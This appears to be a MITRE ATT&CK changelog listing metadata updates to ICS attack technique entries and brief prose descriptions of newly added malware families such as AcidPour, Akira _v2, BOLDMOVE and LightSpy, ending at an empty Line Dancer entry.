values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:04.376000+00:00 | 2025-04-16 21:26:13.771000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0805] Block Serial COM
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:00.184000+00:00 | 2025-04-16 21:26:10.923000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0806] Brute Force I/O
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.037000+00:00 | 2025-04-16 21:26:16.573000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0892] Change Credential
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:14.123000+00:00 | 2025-04-16 21:26:20.690000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0858] Change Operating Mode
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:01.367000+00:00 | 2025-04-16 21:26:11.583000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0807] Command-Line Interface
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:00.378000+00:00 | 2025-04-16 21:26:11.069000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0885] Commonly Used Port
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:12.723000+00:00 | 2025-04-16 21:26:19.961000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0884] Connection Proxy
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:11.730000+00:00 | 2025-04-16 21:26:19.127000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0879] Damage to Property
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:06.993000+00:00 | 2025-04-16 21:26:15.731000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0809] Data Destruction
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:04.784000+00:00 | 2025-04-16 21:26:14.108000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0811] Data from Information Repositories
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:03.187000+00:00 | 2025-04-16 21:26:13.205000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0893] Data from Local System
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-09 20:51:03.049000+00:00 | 2025-04-15 19:59:23.577000+00:00 |
[T0812] Default Credentials
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:07.653000+00:00 | 2025-04-16 21:26:16.206000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0813] Denial of Control
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:12.329000+00:00 | 2025-04-15 19:59:15.775000+00:00 |
| external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0814] Denial of Service
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 19:00:55.006000+00:00 | 2025-04-15 19:58:10.656000+00:00 |
[T0815] Denial of View
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:05.576000+00:00 | 2025-04-15 19:58:33.142000+00:00 |
| external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0868] Detect Operating Mode
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:01.778000+00:00 | 2025-04-16 21:26:11.972000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0816] Device Restart/Shutdown
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:00.768000+00:00 | 2025-04-16 21:26:11.395000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0817] Drive-by Compromise
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:06.780000+00:00 | 2025-04-16 21:26:15.525000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0871] Execution through API
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:05.776000+00:00 | 2025-04-16 21:26:14.643000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0819] Exploit Public-Facing Application
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:02.990000+00:00 | 2025-04-16 21:26:13.044000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0820] Exploitation for Evasion
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.425000+00:00 | 2025-04-16 21:26:16.960000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0890] Exploitation for Privilege Escalation
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:11.342000+00:00 | 2025-04-16 21:26:18.792000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0866] Exploitation of Remote Services
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:07.457000+00:00 | 2025-04-16 21:26:16.054000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0822] External Remote Services
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:07.840000+00:00 | 2025-04-16 21:26:16.385000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0823] Graphical User Interface
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.992000+00:00 | 2025-04-16 21:26:17.144000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0891] Hardcoded Credentials
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:10.962000+00:00 | 2025-04-16 21:26:18.583000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0874] Hooking
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.803000+00:00 | 2025-04-15 19:58:56.978000+00:00 |
| external_references[2]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0877] I/O Image
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:05.375000+00:00 | 2025-04-16 21:26:14.462000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0872] Indicator Removal on Host
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:05.190000+00:00 | 2025-04-16 21:26:14.295000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0883] Internet Accessible Device
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:13.719000+00:00 | 2025-04-16 21:26:20.494000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0867] Lateral Tool Transfer
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:13.327000+00:00 | 2025-04-16 21:26:20.126000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0826] Loss of Availability
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:09.581000+00:00 | 2025-04-15 19:59:00.088000+00:00 |
| external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0827] Loss of Control
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:08.613000+00:00 | 2025-04-15 19:58:56.356000+00:00 |
| external_references[3]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[3]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0828] Loss of Productivity and Revenue
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:06.362000+00:00 | 2025-04-16 21:26:15.157000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0837] Loss of Protection
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:01.994000+00:00 | 2025-04-16 21:26:12.172000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0880] Loss of Safety
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:06.171000+00:00 | 2025-04-16 21:26:14.990000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0829] Loss of View
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
| x_mitre_detection | | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:59.396000+00:00 | 2025-04-15 19:58:08.228000+00:00 |
| external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0835] Manipulate I/O Image
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:03.589000+00:00 | 2025-04-15 19:58:22.225000+00:00 |
| external_references[1]['description'] | Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved. 2018/03/29 | Dr. Kelvin T. Erickson 2010, December Programmable logic controller hardware Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.isa.org/standards-and-publications/isa-publications/intech/2010/december/programmable-logic-controller-hardware/ | https://www.scribd.com/document/458637574/Programmable-Logic-Controllers |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0831] Manipulation of Control
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:59.793000+00:00 | 2025-04-16 21:26:10.752000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0832] Manipulation of View
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:04.993000+00:00 | 2025-04-15 19:58:29.210000+00:00 |
| external_references[2]['description'] | Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 | Michael J. Assante and Robert M. Lee SANS Industrial Control System (ICS) Security; The Industrial Control System Cyber Kill Chain Retrieved 2024/11/25 |
| external_references[2]['url'] | https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 | https://icscsi.org/library/Documents/White_Papers/SANS%20-%20ICS%20Cyber%20Kill%20Chain.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0849] Masquerading
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:10.181000+00:00 | 2025-04-16 21:26:18.036000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0838] Modify Alarm Settings
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:12.528000+00:00 | 2025-04-16 21:26:19.764000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0821] Modify Controller Tasking
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:58.991000+00:00 | 2025-04-16 21:26:10.230000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0836] Modify Parameter
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:58.786000+00:00 | 2025-04-16 21:26:10.077000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0889] Modify Program
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-20 17:01:10.138000+00:00 | 2025-04-15 19:59:24.213000+00:00 |
[T0839] Module Firmware
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:13.531000+00:00 | 2025-04-16 21:26:20.310000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0801] Monitor Process State
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:02.197000+00:00 | 2025-04-16 21:26:12.337000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0834] Native API
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:09.388000+00:00 | 2025-04-16 21:26:17.499000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0840] Network Connection Enumeration
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-03-29 14:04:50.569000+00:00 | 2025-04-15 19:59:18.381000+00:00 |
[T0842] Network Sniffing
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:03.783000+00:00 | 2025-04-16 21:26:13.380000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0861] Point & Tag Identification
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:00.575000+00:00 | 2025-04-16 21:26:11.231000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0843] Program Download
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:10.374000+00:00 | 2025-04-16 21:26:18.212000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0845] Program Upload
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:02.785000+00:00 | 2025-04-16 21:26:12.867000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0873] Project File Infection
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:12.926000+00:00 | 2025-04-15 19:59:17.481000+00:00 |
| external_references[2]['description'] | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf | https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0886] Remote Services
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:12.125000+00:00 | 2025-04-16 21:26:19.525000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0846] Remote System Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:11.536000+00:00 | 2025-04-16 21:26:18.958000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0888] Remote System Information Discovery
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:02.595000+00:00 | 2025-04-16 21:26:12.694000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0847] Replication Through Removable Media
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:10.581000+00:00 | 2025-04-15 19:59:04.946000+00:00 |
| external_references[7]['description'] | Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 | Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses. Retrieved November 17, 2024. |
| external_references[7]['url'] | https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/ | https://web.archive.org/web/20160430041256/https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0848] Rogue Master
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:09.193000+00:00 | 2025-04-16 21:26:17.326000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0851] Rootkit
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:03.989000+00:00 | 2025-04-16 21:26:13.542000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0852] Screen Capture
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:10.768000+00:00 | 2025-04-16 21:26:18.404000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0853] Scripting
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:02.398000+00:00 | 2025-04-16 21:26:12.511000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0881] Service Stop
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:58.586000+00:00 | 2025-04-15 19:58:03.170000+00:00 |
[T0865] Spearphishing Attachment
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:06.577000+00:00 | 2025-04-16 21:26:15.346000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0856] Spoof Reporting Message
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:07.260000+00:00 | 2025-04-16 21:26:15.909000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0869] Standard Application Layer Protocol
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:11.924000+00:00 | 2025-04-16 21:26:19.328000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0862] Supply Chain Compromise
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:05.975000+00:00 | 2025-04-16 21:26:14.822000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0894] System Binary Proxy Execution
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-08 18:57:58.010000+00:00 | 2025-04-15 19:58:11.559000+00:00 |
[T0857] System Firmware
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:09.988000+00:00 | 2025-04-16 21:26:17.862000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0882] Theft of Operational Information
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:09.780000+00:00 | 2025-04-16 21:26:17.698000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0864] Transient Cyber Asset
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:03.395000+00:00 | 2025-04-15 19:58:21.226000+00:00 |
[T0855] Unauthorized Command Message
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:04.582000+00:00 | 2025-04-16 21:26:13.939000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0863] User Execution
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:00.969000+00:00 | 2025-04-15 19:58:15.054000+00:00 |
| external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0859] Valid Accounts
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:11.152000+00:00 | 2025-04-15 19:59:08.866000+00:00 |
| external_references[1]['description'] | Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 | Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024. |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[T0860] Wireless Compromise
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:57:01.165000+00:00 | 2025-04-15 19:58:15.610000+00:00 |
| external_references[1]['description'] | Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 | Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.slideshare.net/dgpeters/17-bolshev-1-13 | https://www.slideshare.net/slideshow/17-bolshev-1-13/32178888 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[T0887] Wireless Sniffing
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-10-13 17:56:59.193000+00:00 | 2025-04-16 21:26:10.392000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Software
enterprise-attack
New Software
[S1167] AcidPour
Current version: 1.0
Description:
AcidPour is a variant of AcidRain designed to impact a wider range of x86 architecture Linux devices. AcidPour is an x86 ELF binary that expands on the targeted devices and locations in AcidRain by including items such as Unsorted Block Image (UBI), Deice Mapper (DM), and various flash memory references. Based on this expanded targeting, AcidPour can impact a variety of device types including IoT, networking, and ICS embedded device types.(Citation: SentinelOne AcidPour 2024) AcidPour is a wiping payload associated with the Sandworm Team threat actor, and potentially linked to attacks against Ukrainian internet service providers (ISPs) in 2023.(Citation: CERT-UA TelecomAttack 2023)
[S1194] Akira _v2
Current version: 1.0
Description:
Akira _v2 is a Rust-based variant of Akira ransomware that has been in use since at least 2024. Akira _v2 is designed to target VMware ESXi servers and includes a new command-line argument set and other expanded capabilities.(Citation: CISA Akira Ransomware APR 2024)(Citation: Cisco Akira Ransomware OCT 2024)(Citation: Palo Alto Howling Scorpius DEC 2024)
[S1184] BOLDMOVE
Current version: 1.0
Description:
BOLDMOVE is a type of backdoor malware written in C linked to People’s Republic of China operations from 2022 through 2023. BOLDMOVE includes both Windows and Linux variants, with some Linux variants specifically designed for FortiGate Firewall devices. BOLDMOVE is linked to zero-day exploitation of CVE-2022-42475 in FortiOSS SSL-VPNs.(Citation: Google Cloud BOLDMOVE 2023) The record for BOLDMOVE only covers known Linux variants.
[S1181] BlackByte 2.0 Ransomware
Current version: 1.0
Description:
BlackByte 2.0 Ransomware is a replacement for BlackByte Ransomware. Unlike BlackByte Ransomware, BlackByte 2.0 Ransomware does not have a common key for victim decryption. BlackByte 2.0 Ransomware remains uniquely associated with BlackByte operations.(Citation: Microsoft BlackByte 2023)
[S1180] BlackByte Ransomware
Current version: 1.0
Description:
BlackByte Ransomware is uniquely associated with BlackByte operations. BlackByte Ransomware used a common key for infections, allowing for the creation of a universal decryptor.(Citation: Trustwave BlackByte 2021)(Citation: FBI BlackByte 2022) BlackByte Ransomware was replaced in BlackByte operations by BlackByte 2.0 Ransomware by 2023.(Citation: Microsoft BlackByte 2023)(Citation: Cisco BlackByte 2024)
[S1179] Exbyte
Current version: 1.0
Description:
Exbyte is an exfiltration tool written in Go that is uniquely associated with BlackByte operations. Observed since 2022, Exbyte transfers collected files to online file sharing and hosting services.(Citation: Symantec BlackByte 2022)
[S1197] GoBear
Current version: 1.0
Description:
GoBear is a Go-based backdoor that abuses legitimate, stolen certificates for defense evasion purposes. GoBear is exclusively linked to Kimsuky operations.(Citation: S2W Troll Stealer 2024)(Citation: Symantec Troll Stealer 2024)
[S1198] Gomir
Current version: 1.0
Description:
Gomir is a Linux backdoor variant of the Go-based malware GoBear, uniquely assoicated with Kimsuky operations.(Citation: Symantec Troll Stealer 2024)
[S1211] Hannotog
Current version: 1.0
Description:
Hannotog is a type of backdoor malware uniquely assoicated with Lotus Blossom operations since at least 2022.(Citation: Symantec Bilbug 2022)
[S1203] J-magic
Current version: 1.0
Description:
J-magic is a custom variant of the cd00r backdoor tailored to target Juniper routers that was first observed during the J-magic Campaign in mid-2023. J-magic monitors TCP traffic for five predefined parameters or "magic packets" to be sent by the attackers before activating on compromised devices.(Citation: Lumen J-Magic JAN 2025)
[S1206] JumbledPath
Current version: 1.0
Description:
JumbledPath is a custom-built utility written in GO that has been used by Salt Typhoon since at least 2024 for packet capture on remote Cisco devices. JumbledPath is compiled as an ELF binary using x86-64 architecture which makes it potentially useable across Linux operating systems and network devices from multiple vendors.(Citation: Cisco Salt Typhoon FEB 2025)
[S1190] Kapeka
Current version: 1.0
Description:
Kapeka is a backdoor written in C++ used against victims in Eastern Europe since at least mid-2022. Kapeka has technical overlaps with Exaramel for Windows and Prestige malware variants, both of which are linked to Sandworm Team. Kapeka may have been used in advance of Prestige deployment in late 2022.(Citation: WithSecure Kapeka 2024)(Citation: Microsoft KnuckleTouch 2024)
[S1185] LightSpy
Current version: 1.0
Description:
First observed in 2018, LightSpy is a modular malware family that initially targeted iOS devices in Southern Asia before expanding to Android and macOS platforms. It consists of a downloader, a main executable that manages network communications, and functionality-specific modules, typically implemented as .dylib files (iOS, macOS) or .apk files (Android). LightSpy can collect VoIP call recordings, SMS messages, and credential stores, which are then exfiltrated to a command and control (C2) server.(Citation: MelikovBlackBerry LightSpy 2024)
[S1186] Line Dancer
Current version: 1.0
Description:
